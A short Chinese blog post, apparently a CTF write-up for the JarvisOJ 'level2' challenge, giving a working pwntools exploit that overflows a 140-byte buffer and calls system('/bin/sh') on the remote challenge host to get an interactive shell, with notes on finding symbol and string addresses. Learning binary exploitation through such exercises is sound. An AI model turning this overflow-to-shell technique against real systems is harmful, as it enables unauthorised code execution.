这一题根上一题有很多相似的地方
而且比上一道还简单了不少
因为其给出了/bin/sh字符串
所以就不细说了
主要是因为exp比较有意思
学到了一些东西
所以想记录下来
from pwn import*
p = remote("pwn2.jarvisoj.com","9878")
elf = ELF("./level2")
sys_addr = elf.symbols["system"]
bin_addr = elf.search("/bin/sh").next()
payload = 'a'*140+p32(sys_addr)+'a'*4+p32(bin_addr)
p.recvuntil("Input:")
p.sendline(payload)
p.interactive()
现在是明白了 elf.symbols调用的确实是函数地址
是这个函数在这个程序中所在的位置
而你下断点所给出的位置是在程序运行过程中
遇到要用到这个函数的位置
elf.search("/bin/sh").next()
还有这个寻找字符串地址的方法
在IDA出错的时候会有用
‘a’*4的原因参见我的上一篇博客